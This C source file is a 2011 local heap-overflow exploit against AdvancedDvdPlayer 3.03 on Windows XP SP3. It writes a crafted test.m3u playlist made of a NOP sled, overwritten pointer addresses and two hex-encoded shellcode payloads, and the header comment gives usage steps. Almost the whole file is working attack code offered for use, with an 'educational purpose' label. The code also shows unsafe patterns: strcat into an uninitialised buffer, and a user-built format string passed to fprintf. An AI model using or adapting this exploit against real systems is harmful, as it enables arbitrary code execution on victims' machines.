/*
Not so usual exploit method
Local Heapoverflow exploit
An Advanced Exploit For An AdvancedDvdPlayer ;)
02-10-2011
AdvancedDvdPlayer 3.03
Download Link : http://download.cnet.com/Advanced-DVD-Player/3000-2139_4-10310889.html?tag=mncol;3
Tested on WinXP SP3
Compile and make a playlist and name it test.m3u, then run this en put the new test.m3u in de
\Program Files\AdvancedDVDPlayer folder then run
Old application but i wanna show this way of exploitation for educational purpose.
Owned by GoTr00t!
mail:aksuumit[AT]hotmail.com
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
char scode_calc[] = "\x33\xDB" // xor EBX,EBX
"\x33\xD2" // xor EDX,EDX
"\x33\xFF" // XOR EDI,EDI
"\x33\xF6" // XOR ESI,ESI
"\x33\xC0\x50\x68\x43\x41\x4C\x43"
"\x8B\xCC\x51\xE8\x10\x92\x53\x76"; // Hardcoded shellcode addresses!
int main(){
char exploit[1000];
char NOPS[303];
memset(NOPS,0x90,sizeof(NOPS));
char shellcode[] = "\x33\xc0\x50\x68\xA0\xA0\xA0\x41"
"\x68\x57\x4E\x45\x44\x68\x52\x45\xA0\x4F"
"\x68\x4F\x55\xA0\x41\x68\xA0\xA0\xA0\x59"
"\x8B\xCC\x50\x51\x51\x50\xE8\xFD\x05\xd6\x7c"; // hardcoded addressed!
// 016F018C pointer to the pointer
char EAX[] = "\x8C\x01\x6F\x01";
strcat(exploit,"1\n");
strcat(exploit,NOPS);
strcat(exploit,"\x90"); // strange but without it my compiler wont compile it good ?
strcat(exploit,EAX);
strcat(exploit,"\x6C\x01\x6F\x01"); ////// 016F016C pointer to the actual call address
strcat(exploit,"\x94\x01\x6F\x01"); //// 016F0194
strcat(exploit,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");
strcat(exploit,scode_calc);
strcat(exploit,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");
strcat(exploit,shellcode);
strcat(exploit,".mpg\n");
FILE *fp;
fp=fopen("test.m3u","w");
fprintf(fp,exploit);
fclose(fp);
return 0;
}
